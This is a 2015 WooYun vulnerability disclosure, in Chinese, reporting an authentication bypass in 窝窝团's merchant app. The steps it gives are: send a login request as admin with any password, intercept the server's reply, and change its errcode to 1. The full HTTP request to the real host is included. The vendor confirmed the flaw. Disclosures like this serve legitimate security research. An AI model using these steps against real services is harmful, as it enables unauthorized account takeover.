当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141369

漏洞标题:窝窝团某处存在漏洞可登陆任意用户密码(以admin为例)

相关厂商:窝窝团

漏洞作者: Martial

提交时间:2015-09-15 18:14

修复时间:2015-10-31 16:30

公开时间:2015-10-31 16:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

成功登陆admin

详细说明:

问题出现在 窝窝团的商家版
用账号admin登陆 密码随便输

POST /Service.asmx/paybilllogin HTTP/1.1
Host: padserver.55tuan.com
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Accept-Language: zh-cn
Accept: */*
Connection: keep-alive
User-Agent: 55tong/20150730175935 CFNetwork/711.4.6 Darwin/14.0.0
pid=2.0.0&password=123456&account=admin&session=3a0fe04d5f1d4c908971176200f3acee&timespan=1442311403&keystring=e9b7c5506eb5d008e58d705d10beb82c&


这里抓包

2.jpg


然后修改返回包 将errcode改为1

3.jpg


成功登陆

4.jpg


5.jpg

漏洞证明:

5.jpg

修复方案:

判断逻辑要完善下

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-16 16:28

厂商回复:

感谢白帽子帮我们发现问题~

最新状态:

暂无